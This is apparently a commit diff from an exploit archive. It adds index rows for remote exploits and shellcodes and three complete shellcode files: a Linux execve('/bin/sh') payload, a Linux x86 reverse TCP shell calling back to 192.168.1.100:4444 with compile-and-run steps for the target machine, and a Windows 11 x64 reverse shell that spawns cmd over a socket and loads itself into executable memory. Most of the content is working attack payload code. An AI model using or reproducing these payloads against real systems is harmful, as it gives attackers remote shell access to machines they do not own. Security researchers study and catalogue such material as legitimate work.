52315,exploits/windows/remote/52315.py,"Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE)",2025-06-05,"Mohammed Idrees Banyamer",remote,windows,,2025-06-05,2025-06-05,0,CVE-2025-30397,,,,,
28482,exploits/windows/remote/28482.rb,"Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071) (Metasploit)",2013-09-23,Metasploit,remote,windows,,2013-09-23,2013-09-23,1,CVE-2013-0810;OSVDB-97136;MS13-071,"Metasploit Framework (MSF)",,,,
46220,exploits/windows/remote/46220.txt,"Microsoft Windows VCF or Contact' File - URL Manipulation-Spoof Arbitrary Code Execution",2019-01-22,"Eduardo Braun Prado",remote,windows,,2019-01-22,2019-01-22,0,,,,,,
34931,exploits/windows/remote/34931.c,"Microsoft Windows Vista - 'lpksetup.exe oci.dll' DLL Loading Arbitrary Code Execution",2010-10-25,"Tyler Borland",remote,windows,,2010-10-25,2014-10-10,1,,,,,,https://www.securityfocus.com/bid/44414/info
@ -45350,6 +45374,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
34668,exploits/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)",2014-09-15,"Daniele Linguaglossa",remote,windows,80,2014-09-15,2016-10-10,1,CVE-2014-6287;OSVDB-111386,,,http://www.exploit-db.com/screenshots/idlt35000/screen-shot-2014-10-28-at-91538-am.png,http://www.exploit-db.comhfs2.3_288.zip,
39161,exploits/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)",2016-01-04,"Avinash Thapa",remote,windows,,2016-01-04,2016-05-09,1,CVE-2014-6287;OSVDB-111386,,,,http://www.exploit-db.comhfs2.3c.src.zip,
49599,exploits/windows/remote/49599.py,"Remote Desktop Web Access - Authentication Timing Attack (Metasploit Module)",2021-02-26,"Matthew Dunn",remote,windows,,2021-02-26,2021-02-26,0,,,,,,
52299,exploits/windows/remote/52299.py,"Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE)",2025-05-21,"Chokri Hammedi",remote,windows,,2025-05-21,2025-05-21,0,,,,,,
46697,exploits/windows/remote/46697.py,"RemoteMouse 3.008 - Arbitrary Remote Command Execution",2019-04-15,0rphon,remote,windows,,2019-04-15,2021-01-08,1,,Remote,,http://www.exploit-db.com/screenshots/idlt47000/image.png,http://www.exploit-db.comRemoteMouse.exe,
1565,exploits/windows/remote/1565.pl,"RevilloC MailServer 1.21 - 'USER' Remote Buffer Overflow",2006-03-07,"securma massine",remote,windows,110,2006-03-06,,1,OSVDB-23735;CVE-2006-1124,,,,,
16775,exploits/windows/remote/16775.rb,"RhinoSoft Serv-U FTP Server - Session Cookie Buffer Overflow (Metasploit)",2010-03-10,Metasploit,remote,windows,,2010-03-10,2016-09-27,1,CVE-2009-4006;OSVDB-59772,"Metasploit Framework (MSF)",,,,
@ -45926,6 +45951,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41073,exploits/windows/remote/41073.py,"WinaXe Plus 8.7 - Remote Buffer Overflow",2017-01-16,"Peter Baris",remote,windows,,2017-01-16,2017-01-16,1,,,,http://www.exploit-db.com/screenshots/idlt41500/screen-shot-2017-01-16-at-152056.png,http://www.exploit-db.comwinaxep.exe,
16335,exploits/windows/remote/16335.rb,"WinComLPD 3.0.2 - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows,,2010-06-22,2011-03-06,1,CVE-2008-5159;OSVDB-42861,"Metasploit Framework (MSF)",,,,
51575,exploits/windows/remote/51575.txt,"Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution",2023-07-07,nu11secur1ty,remote,windows,,2023-07-07,2023-07-07,0,CVE-2022-21907,,,,,
52300,exploits/windows/remote/52300.py,"Windows 2024.15 - Unauthenticated Desktop Screenshot Capture",2025-05-25,"Chokri Hammedi",remote,windows,,2025-05-25,2025-05-25,0,CVE-n/a,,,,,
52310,exploits/windows/remote/52310.py,"Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure",2025-05-29,"Mohammed Idrees Banyamer",remote,windows,,2025-05-29,2025-05-29,0,CVE-2025-24071,,,,,
30169,exploits/windows/remote/30169.txt,"WindowsPT 1.2 - User ID Key Spoofing",2007-06-11,nnposter,remote,windows,,2007-06-11,2013-12-10,1,CVE-2007-3201;OSVDB-41727,,,,,https://www.securityfocus.com/bid/24412/info
16529,exploits/windows/remote/16529.rb,"WinDVD7 - 'IASystemInfo.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-03-10,1,CVE-2007-0348;OSVDB-34315,"Metasploit Framework (MSF)",,,,
7875,exploits/windows/remote/7875.pl,"WinFTP Server 2.3.0 - 'LIST' (Authenticated) Remote Buffer Overflow",2009-01-26,"joe walko",remote,windows,21,2009-01-25,2016-09-27,1,OSVDB-51667;CVE-2009-0351,,,,,

Can't render this file because it is too large.

3
files_shellcodes.csv
View file

@ -630,6 +630,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
17371,shellcodes/linux_x86/17371.c,"Linux/x86 - Reverse (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",,linux_x86,422,2011-06-08,2018-01-17,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-770.php
43674,shellcodes/linux_x86/43674.c,"Linux/x86 - Reverse (www.netric.org:45295/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,eSDee,,linux_x86,131,2018-01-17,2018-01-17,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-552.php
13340,shellcodes/linux_x86/13340.c,"Linux/x86 - Reverse PHP (Writes To /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)",2008-08-18,GS2008,,linux_x86,508,2008-08-17,2017-07-04,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-208.php
52297,shellcodes/linux_x86/52297.c,"Linux/x86 - Reverse TCP Shellcode (95 bytes)",2025-05-21,"Al Baradi Joy",,linux_x86,95,2025-05-21,2025-05-21,0,,,,,,
35519,shellcodes/linux_x86/35519.c,"Linux/x86 - rmdir() Shellcode (37 bytes)",2014-12-11,kw4,,linux_x86,37,2014-12-30,2014-12-30,0,,,,,,
43691,shellcodes/linux_x86/43691.c,"Linux/x86 - rmdir(/tmp/willdeleted) Shellcode (41 bytes)",2010-05-31,gunslinger_,,linux_x86,41,2018-01-17,2018-01-17,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-633.php
18379,shellcodes/linux_x86/18379.c,"Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)",2012-01-17,rigan,,linux_x86,380,2012-01-17,2017-08-24,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-799.php
@ -820,6 +821,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",,linux_x86-64,31,2017-03-03,2017-08-24,0,,,,,,
13320,shellcodes/linux_x86-64/13320.c,"Linux/x64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,,linux_x86-64,49,2009-05-13,2017-07-04,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-77.php
47183,shellcodes/linux_x86-64/47183.c,"Linux/x86 - execve(/bin/sh) + NOT +SHIFT-N+ XOR-N Encoded Shellcode (168 bytes)",2019-07-29,"Pedro Cabral",,linux_x86-64,168,2019-07-29,2019-08-01,0,,,,,,
52296,shellcodes/linux_x86-64/52296.asm,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (36 bytes)",2025-05-21,"Sayan Ray",,linux_x86-64,36,2025-05-21,2025-05-21,0,,,,,,
51258,shellcodes/linux_x86-64/51258.txt,"Linux/x86_64 - bash Shellcode with xor encoding",2023-04-05,"Jeenika Anadani",,linux_x86-64,71,2023-04-05,2023-04-05,0,,,,,,
47290,shellcodes/linux_x86-64/47290.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (129 bytes)",2019-08-19,"Gonçalo Ribeiro",,linux_x86-64,129,2019-08-19,2019-08-20,0,,,,,,
46979,shellcodes/linux_x86-64/46979.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2019-06-10,"Aron Mihaljevic",,linux_x86-64,104,2019-06-10,2019-06-10,0,,,,,,
@ -1039,6 +1041,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
50368,shellcodes/windows_x86/50368.c,"Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)",2021-10-01,"Daniel Ortiz",,windows_x86,,2021-10-01,2021-10-29,0,,,,,,
39900,shellcodes/windows_x86/39900.c,"Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",,windows_x86,184,2016-06-07,2016-09-05,0,,,,,,
14288,shellcodes/windows_x86/14288.asm,"Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",,windows_x86,278,2010-07-09,2017-08-24,1,CVE-2010-0425,,,,,http://shell-storm.org/shellcode/files/shellcode-681.php
52298,shellcodes/windows_x86-64/52298.py,"Windows 11 x64 - Reverse TCP Shellcode (564 bytes)",2025-05-21,"Victor Huerlimann",,windows_x86-64,564,2025-05-21,2025-05-21,0,,,,,,
41827,shellcodes/windows_x86-64/41827.asm,"Windows/x64 (10) - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",,windows_x86-64,45,2017-04-06,2017-04-06,0,,,,,,
45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter (w00tw00t) Shellcode (50 bytes)",2018-08-29,n30m1nd,,windows_x86-64,50,2018-08-29,2018-09-08,0,,,,,,
37895,shellcodes/windows_x86-64/37895.asm,"Windows/x64 (2003) - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",,windows_x86-64,59,2015-08-20,2015-08-20,0,,,,,,

1 id file description date_published author type platform size date_added date_updated verified codes tags aliases screenshot_url application_url source_url
630 17371 shellcodes/linux_x86/17371.c Linux/x86 - Reverse (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes) 2011-06-08 Jonathan Salwan linux_x86 422 2011-06-08 2018-01-17 1 http://shell-storm.org/shellcode/files/shellcode-770.php
631 43674 shellcodes/linux_x86/43674.c Linux/x86 - Reverse (www.netric.org:45295/TCP) Shell (/bin/sh) Shellcode (131 bytes) 2009-01-01 eSDee linux_x86 131 2018-01-17 2018-01-17 0 http://shell-storm.org/shellcode/files/shellcode-552.php
632 13340 shellcodes/linux_x86/13340.c Linux/x86 - Reverse PHP (Writes To /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes) 2008-08-18 GS2008 linux_x86 508 2008-08-17 2017-07-04 1 http://shell-storm.org/shellcode/files/shellcode-208.php
633 52297 shellcodes/linux_x86/52297.c Linux/x86 - Reverse TCP Shellcode (95 bytes) 2025-05-21 Al Baradi Joy linux_x86 95 2025-05-21 2025-05-21 0
634 35519 shellcodes/linux_x86/35519.c Linux/x86 - rmdir() Shellcode (37 bytes) 2014-12-11 kw4 linux_x86 37 2014-12-30 2014-12-30 0
635 43691 shellcodes/linux_x86/43691.c Linux/x86 - rmdir(/tmp/willdeleted) Shellcode (41 bytes) 2010-05-31 gunslinger_ linux_x86 41 2018-01-17 2018-01-17 0 http://shell-storm.org/shellcode/files/shellcode-633.php
636 18379 shellcodes/linux_x86/18379.c Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes) 2012-01-17 rigan linux_x86 380 2012-01-17 2017-08-24 1 http://shell-storm.org/shellcode/files/shellcode-799.php
821 41498 shellcodes/linux_x86-64/41498.nasm Linux/x64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes) 2017-03-03 Robert L. Taylor linux_x86-64 31 2017-03-03 2017-08-24 0
822 13320 shellcodes/linux_x86-64/13320.c Linux/x64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes) 2009-05-14 evil.xi4oyu linux_x86-64 49 2009-05-13 2017-07-04 1 http://shell-storm.org/shellcode/files/shellcode-77.php
823 47183 shellcodes/linux_x86-64/47183.c Linux/x86 - execve(/bin/sh) + NOT +SHIFT-N+ XOR-N Encoded Shellcode (168 bytes) 2019-07-29 Pedro Cabral linux_x86-64 168 2019-07-29 2019-08-01 0
824 52296 shellcodes/linux_x86-64/52296.asm Linux/x86-64 - execve(_/bin/sh_) Shellcode (36 bytes) 2025-05-21 Sayan Ray linux_x86-64 36 2025-05-21 2025-05-21 0
825 51258 shellcodes/linux_x86-64/51258.txt Linux/x86_64 - bash Shellcode with xor encoding 2023-04-05 Jeenika Anadani linux_x86-64 71 2023-04-05 2023-04-05 0
826 47290 shellcodes/linux_x86-64/47290.c Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (129 bytes) 2019-08-19 Gonçalo Ribeiro linux_x86-64 129 2019-08-19 2019-08-20 0
827 46979 shellcodes/linux_x86-64/46979.c Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes) 2019-06-10 Aron Mihaljevic linux_x86-64 104 2019-06-10 2019-06-10 0
1041 50368 shellcodes/windows_x86/50368.c Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes) 2021-10-01 Daniel Ortiz windows_x86 2021-10-01 2021-10-29 0
1042 39900 shellcodes/windows_x86/39900.c Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes) 2016-06-07 Roziul Hasan Khan Shifat windows_x86 184 2016-06-07 2016-09-05 0
1043 14288 shellcodes/windows_x86/14288.asm Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes) 2010-07-09 Brett Gervasoni windows_x86 278 2010-07-09 2017-08-24 1 CVE-2010-0425 http://shell-storm.org/shellcode/files/shellcode-681.php
1044 52298 shellcodes/windows_x86-64/52298.py Windows 11 x64 - Reverse TCP Shellcode (564 bytes) 2025-05-21 Victor Huerlimann windows_x86-64 564 2025-05-21 2025-05-21 0
1045 41827 shellcodes/windows_x86-64/41827.asm Windows/x64 (10) - Egghunter Shellcode (45 bytes) 2017-04-06 Peter Baris windows_x86-64 45 2017-04-06 2017-04-06 0
1046 45293 shellcodes/windows_x86-64/45293.c Windows/x64 (10) - WoW64 Egghunter (w00tw00t) Shellcode (50 bytes) 2018-08-29 n30m1nd windows_x86-64 50 2018-08-29 2018-09-08 0
1047 37895 shellcodes/windows_x86-64/37895.asm Windows/x64 (2003) - Token Stealing Shellcode (59 bytes) 2015-08-20 Fitzl Csaba windows_x86-64 59 2015-08-20 2015-08-20 0

31
shellcodes/linux_x86-64/52296.asm Normal file
View file

@ -0,0 +1,31 @@
# Exploit Title: Linux/x86-64 execve("/bin/sh") Shellcode (36 bytes)
# Date: 2025-03-23
# Exploit Author: Sayan Ray [@barebones90]
# Tested on: Linux x86-64
# CVE: N/A
; P0P SH311 execve ("/bin/sh", NULL, NULL)
GLOBAL _start
section .text
_start:
xor rax, rax
push rax
mov r10, 0x68732f6e69622f ; hs/nib/
push r10
mov rdi, rsp ; rdi points to the string "/bin/sh" from the stack
; ( const char *pathname )
; Calling execve
mov rax, 0x3b ; 59 [execve syscall]
mov rsi, 0 ; NULL ( char *const _Nullable argv[] )
mov rdx, 0 ; NULL ( char *const _Nullable envp[] )
syscall
; Shellcode:
; \x48\x31\xc0\x50\x49\xba\x2f\x62\x69\x6e\x2f\x73\x68\x00\x41\x52\x48\x89\xe7\xb8\x3b\x00\x00\x00\xbe\x00\x00\x00\x00\xba\x00\x00\x00\x00\x0f\x05
; [Length] : 36

43
shellcodes/linux_x86/52297.c Normal file
View file

@ -0,0 +1,43 @@
/*
# Exploit Title: Linux/x86 - Reverse TCP Shellcode (95 bytes)
# Date: 2025-04-06
# Exploit Author: Al Baradi Joy
# Platform: Linux x86
# Type: Shellcode
# Shellcode Length: 95 bytes
# Tested On: Kali Linux x86
# Connect-Back IP: 192.168.1.100
# Connect-Back Port: 4444
Description:
This is a null-free reverse TCP shell shellcode for Linux x86 that connects back to 192.168.1.100:4444 and spawns a /bin/sh shell. Useful in remote code execution exploits for getting a remote shell.
Usage:
Start a netcat listener on your attacking machine:
nc -lvnp 4444
Compile and run on the target machine:
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
./shellcode
*/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2" // zero out registers
"\x50\x6a\x01\x6a\x02\x89\xe1\xb0\x66" // socket syscall
"\xcd\x80\x89\xc6\x31\xc0\x68\xc0\xa8\x01\x64" // push IP: 192.168.1.100
"\x66\x68\x11\x5c" // push port 4444
"\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56"
"\x89\xe1\xb0\x66\xb3\x03\xcd\x80" // connect
"\x31\xc9\xb1\x02\x89\xf3\xb0\x3f" // dup2 loop
"\xcd\x80\x49\x79\xf9"
"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
"\x89\xe3\x31\xc9\xb0\x0b\xcd\x80"; // execve("/bin/sh")
int main() {
printf("Shellcode Length: %zu\n", strlen(shellcode));
int (*ret)() = (int(*)())shellcode;
ret();
}

335
shellcodes/windows_x86-64/52298.py Executable file
View file

@ -0,0 +1,335 @@
#!/usr/bin/python
#
# Description: Windows 11 x64 Reverse TCP Shell
# Architecture: x64
# OS: Microsoft Windows
# Author: hvictor (Victor Huerlimann)
# Shellcode Size: 564 bytes
# Repository:https://github.com/hvictor/shellcode-x64
#
# Special thanks to wetw0rk (Milton Valencia), from whom I drew inspiration for the indicated parts of the code: https://github.com/wetw0rk/Sickle
#
# Note: You will have to modify the line 193 of this file according to the attacker's IP and port:
# mov r9, 0x7901A8C029230002 # R9 = [IP = 192.168.1.121 | port = 0x2329 = 9001 | AF_INET = 2]
# The high DWORD is the IPv4 address in little-endian, followed by the 2-bytes port in little-endian, and the 2-bytes address family.
import ctypes, struct
from ctypes import wintypes
from keystone import *
CODE = (
'''
start:
mov rbp, rsp
sub rsp, 1600
resolve_kernel32:
mov dl, 0x4b # dl = 'K'
mov rcx, 0x60 #
mov r8, gs:[rcx] # R8 = address of PEB
mov rdi, [r8 + 0x18] # RDI = address of _PEB_LDR_DATA
mov rdi, [rdi + 0x30] # RDI = address of InInitializationOrderModuleList (first _LIST_ENTRY)
search:
xor rcx, rcx
mov rbx, [rdi + 0x10] # RBX = DllBase
mov rsi, [rdi + 0x40] # RSI = address of UNICODE string BaseDllName.Buffer
mov rdi, [rdi] # RDI = address of the next _LIST_ENTRY
cmp [rsi + 0x18], cx # Compare the 24-th UNICODE char with NULL
jne search # If length of BaseDllName is not 12 UNICODE chars, continue searching
cmp [rsi], dl # Compare the first UNICODE char with 'K'
jne search # If the first UNICODE char is not 'K', continue searching
find_function_jmp:
jmp callback # Jump to callback to make a negative (null byte free) call to get_find_function_addr
get_find_function_addr:
pop rsi # The address of find_function is popped in RSI
mov [rbp + 0x8], rsi # The address of find_function is stored at (RBP + 8)
jmp resolve_k32_sym # Once the address of find_function has been stored, proceed with the resolution of kernel32 symbols
callback:
call get_find_function_addr # When this call is done, the address of the 1st instruction find_function (add rsp, 8) is pushed to the stack
# This is the address of find_function, and it will be popped in ESI (see get_find_function_addr).
find_function:
# Current Stack Layout:
#---------------------------------------------------------------------------
# QWORD: Return Address (addr of instruction after "call find_function", see below)
# QWORD: Number of hash bytes + 8 <- RSP
# QWORD: <0x00000000> <Hash of CreateProcessA (4 bytes)>
# QWORD: <0x00000000> <Hash of LoadLibraryA (4 bytes)>
# ...
# QWORD: 0x0000000000000000
#---------------------------------------------------------------------------
add rsp, 8 # Point RSP to (Number of hash bytes + 8)
pop rax # RAX = Number of hash bytes + 8
push -1 # Write -1 on the stack instead of (Number of hash bytes + 8)
add rsp, rax # Add (Number of hash bytes + 8) to RSP: it now points to 0x0000000000000000
# Current Stack Layout:
#---------------------------------------------------------------------------
# QWORD: Return Address
# QWORD: 0xffffffffffffffff
# QWORD: <0x00000000> <Hash of CreateProcessA (4 bytes)>
# QWORD: <0x00000000> <Hash of LoadLibraryA (4 bytes)>
# ...
# QWORD: 0x0000000000000000 <- RSP
#---------------------------------------------------------------------------
find_function_loop2:
xor rax, rax
xor rdi, rdi
mov eax, [rbx + 0x3c] # EAX = offset to the PE Header of the module = e_lfanew
mov edi, [rbx + rax + 0x88] # EDI = RVA of the Export Directory Table of the module (1st field: VirtualAddress)
add rdi, rbx # RDI = VMA of the Export Directory Table of the module
mov ecx, [rdi + 24] # ECX = NumberOfNames (field of the Export Directory Table of the module)
mov eax, [rdi + 32] # EAX = RVA of AddressOfNames (array of Name Addresses, field of the Export Directory Table)
add rax, rbx # EAX = VMA of AddressOfNames
mov [rbp - 8], rax # Save the VMA of AddressOfNames at (EBP - 8): this location is never touched for anything else
find_function_loop:
dec ecx # Initially, ECX = NumberOfNames: decrement to get the index of the last name
mov rax, [rbp - 8] # EAX = VMA of AddressOfNames
mov esi, [rax + rcx * 4] # ESI = RVA of the current Symbol Name
add rsi, rbx # RSI = VMA of the current Symbol Name
compute_hash:
xor rax, rax # EAX = 0
cdq # If the MSB of EAX = 1: EDX = 0x11111111
# If the MSB of EAX = 0: EDX = 0x00000000 -> fills EDX with the sign of EAX
# In this case, EDX = 0x00000000 because EAX = 0x00000000
compute_hash_repeat:
ror edx, 0xd # Right-shift EDX of 13 bits
add edx, eax # EDX += current EAX value
lodsb # Load the byte pointed by ESI into AL
test al, al # Test if the NULL terminator of the Symbol Name has been reached
jnz compute_hash_repeat # If the NULL terminator has been reached (ZF = 1), proceed to hash comparison
# Else, perform the next iteration of the hash-computation algorithm
# At this point, EDX contains the computed hash of the current symbol
find_function_compare:
cmp edx, [rsp - 8] # Compare the computed hash with the hash of the wanted symbol
jnz find_function_loop # If ZF = 0, the hash is different: proceed with the next name from AddressOfNames
# If ZF = 1, the hash is equal: symbol found: continue hereby
mov edx, [rdi + 36] # EDX = RVA of the AddressOfNameOrdinals array
add rdx, rbx # RDX = VMA of the AddressOfNameOrdinals array
mov cx, [rdx + 2 * rcx] # CX = Symbol's Ordinal (lower 16 bits of ECX)
mov edx, [rdi + 28] # EDX = RVA of the AddressOfFunctions array
add rdx, rbx # RDX = VMA of the AddressOfFunctions array
mov eax, [rdx + 4 * rcx] # EAX = AddressOfFunctions[ordinal] = RVA of the wanted symbol
add rax, rbx # EAX = VMA of the wanted symbol
push rax # Push the wanted symbol's VMA onto the stack:
# ATTENTION: The symbol's VMA overwrites its Hash on the stack!
mov rax, [rsp - 8]
cmp rax, -1 # If *(RSP - 8) is -1: ZF = 1: all wanted symbols have been resolved
jnz find_function_loop2 # Until all wanted symbols have been resolved, continue looping
find_function_finish: # When we get here, all wanted symbols have been resolved: their VMAs are on the stack
sub rsp, 16 # Point RSP to the Return Address of find_function
ret # Return
resolve_k32_sym:
mov rax, 0x00000000ec0e4e8e # Hash of LoadLibraryA
push rax
mov rax, 0x0000000016b3fe72 # Hash of CreateProcessA
push rax
mov rax, 0x0000000078b5b983 # Hash of TerminateProcess
push rax
mov rax, 32 # Push 32 onto the stack
push rax
call [rbp + 8] # Call to find_function (see find_function above)
load_ws2_32:
mov rax, 0x0000000000006C6C # 'll x00 x00 x00 x00 x00 x00' (reversed)
push rax
mov rax, 0x642E32335F327377 # 'ws2_32.d' (reversed)
push rax
mov rcx, rsp # Paramter 1 = address of "ws2_32.dll"
sub rsp, 40 # Create 40 bytes of room on the stack
call [rsp + 80] # Call LoadLibraryA
nop
resolve_ws2_sym:
mov rbx, rax # RBX = Base Address of ws2_32.dll
mov rax, 0x0000000060aaf9ec # Hash of connect
push rax
mov rax, 0x00000000adf509d9 # Hash of WSASocketA
push rax
mov rax, 0x000000003bfcedcb # Hash of WSAStartup
push rax
mov rax, 32
push rax # Push 32 (Number of Hashes pushed + 8)
call [rbp + 8] # Call find_function
sub rsp, 512
call_WSAStartup:
mov rcx, 0x202 # RCX = WinSock Version 2.2
lea rdx, [rsp + 800] # RDX = Address of output WSAData structure
call [rsp + 520] # Call WSAStartup
call_WSASocketA:
mov rcx, 2 # Parameter af = 2 (AF_INET)
mov rdx, 1 # Parameter type = 1
mov r8, 6 # Parameter protocol = 6 (TCP)
xor r9, r9 # Parameter lpProtocolInfo = 0
mov [rsp + 32], r9 # Parameter dwFlags = 0
mov [rsp + 40], r9 # Parameter g = 0
call [rsp + 528] # Call WSASocketA
call_connect:
mov rsi, rax # Save socket fd in RSI
mov rcx, rax # RCX = Parameter s = socket fd created with WSSocketA
mov r8, 16 # R8 = Parameter namelen = 16
# Preparation of the sockaddr_in structure on the stack:
# struct sockaddr_in {
# QWORD: [sin_addr (4 bytes) | sin_port (2 bytes) | sin_family (2 bytes)]
# QWORD: sin_zero = [00000000 00000000]
# }
mov r9, 0x7901A8C029230002 # R9 = [IP = 192.168.1.121 | port = 0x2329 = 9001 | AF_INET = 2]
lea rdx, [rsp + 800] # RDX = Parameter name = Address of struct sockaddr_in
mov [rdx], r9 # Write fields: sin_addr, sin_port, sin_family
xor r9, r9
mov [rdx + 8], r9 # Write field sin_zero
call [rsp + 536] # Call connect
# Thanks to wetw0rk (Milton Valencia) for his setup_STARTUPINFOA implementation:
# https://github.com/wetw0rk/Sickle/blob/master/src/sickle/payloads/windows/x64/shell_reverse_tcp.py
create_STARTUPINFOA:
lea rdi, [rsp + 800]
add rdi, 0x300
mov rbx, rdi
xor eax, eax
mov ecx, 0x20
rep stosd # Zero-out 0x80 bytes
mov eax, 0x68 # EAX = sizeof(_STARTUPINFO) = 0x68
mov [rbx], eax # Field lpStartInfo.cb = sizeof(_STARTUPINFO)
mov eax, 0x100 # EAX = STARTF_USESTDHANDLES
mov [rbx + 0x3c], eax # Field lpStartupInfo.dwFlags = STARTF_USESTDHANDLES
mov [rbx + 0x50], rsi # Field lpStartupInfo.hStdInput = socket fd
mov [rbx + 0x58], rsi # Field lpStartupInfo.hStdOutput = socket fd
mov [rbx + 0x60], rsi # Field lpStartupInfo.hStdError = socket fd
# Thanks to wetw0rk (Milton Valencia) for his call_CreateProcessA implementation:
# https://github.com/wetw0rk/Sickle/blob/master/src/sickle/payloads/windows/x64/shell_reverse_tcp.py
call_CreateProccessA:
xor rax, rax
xor rcx, rcx # Parameter lpApplicationName = 0
lea rdx, [rsp + 800] # Parameter lpCommandLine
add rdx, 0x180
mov eax, 0x646d63 # EAX = "cmd"
mov [rdx], rax # Write "cmd" in the lpCommandLine parameter
xor r8, r8 # Parameter lpProcessAttributes = 0
xor r9, r9 # Parameter lpThreadAttributes = 0
xor rax, rax
inc eax
mov [rsp + 0x20], rax # Parameter bInheritHandles = 1
dec eax
mov [rsp + 0x28], rax # Parameter dwCreationFlags = 0
mov [rsp + 0x30], rax # Parameter lpEnvironment = 0
mov [rsp + 0x38], rax # Parameter lpCurrentDirectory = 0
mov [rsp + 0x40], rbx # Parameter lpStartupInfo = address of _STARTUPINFO
add rbx, 0x68
mov [rsp + 0x48], rbx # Parameter lpProcessInformation = output address, right after _STARTUPINFO
call [rsp + 616]
call_TerminateProcess:
xor rcx, rcx
dec rcx # Parameter hProcess = -1 = this process
xor rdx, rdx # Parameter uExitCode = 0 (graceful termination)
int3
call [rsp + 608] # Call TerminateProcess
'''
)
# Initialize engine in 64-bit mode
ks = Ks(KS_ARCH_X86, KS_MODE_64)
encoding, count = ks.asm(CODE)
instructions = ""
for dec in encoding:
instructions += "\\x{0:02x}".format(int(dec)).rstrip("\n")
print("Opcodes = (\"" + instructions + "\")")
print(f"Size: {len(encoding)} bytes.")
# E
# Preparation of WSAStartup (not included in the shellcode)
# Define necessary structures and constants
class WSADATA(ctypes.Structure):
_fields_ = [
("wVersion", wintypes.WORD),
("wHighVersion", wintypes.WORD),
("szDescription", wintypes.CHAR * 257),
("szSystemStatus", wintypes.CHAR * 129),
("iMaxSockets", wintypes.UINT),
("iMaxUdpDg", wintypes.UINT),
("lpVendorInfo", ctypes.POINTER(ctypes.c_char))
]
# Load the Winsock library
ws2_32 = ctypes.windll.ws2_32
# Define the WSAStartup function prototype
# WSAStartup takes two arguments:
# 1. A WORD containing the version of Winsock requested (e.g., 0x0202 for Winsock 2.2)
# 2. A pointer to a WSADATA structure that receives the details of the Winsock implementation
ws2_32.WSAStartup.argtypes = [wintypes.WORD, ctypes.POINTER(WSADATA)]
ws2_32.WSAStartup.restype = wintypes.INT
def call_wsastartup():
# Request version 2.2 (0x0202)
version_requested = 0x0202
# Create an instance of WSADATA to hold the output
wsadata = WSADATA()
# Call WSAStartup
result = ws2_32.WSAStartup(version_requested, ctypes.byref(wsadata))
if result != 0:
raise RuntimeError(f"WSAStartup failed with error code {result}")
print(f"WSAStartup succeeded. Winsock version: {wsadata.wVersion >> 8}.{wsadata.wVersion & 0xFF}")
return wsadata
call_wsastartup()
sh = b""
for e in encoding:
sh += struct.pack("B", e)
shellcode = bytearray(sh)
# Alloco memoria eseguibile per lo shellcode
ptr = ctypes.windll.kernel32.VirtualAlloc(0x10000000,
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
# Metto lo shellcode nel buffer `buf`
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
# Copio lo shellcode nella memoria allocata
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
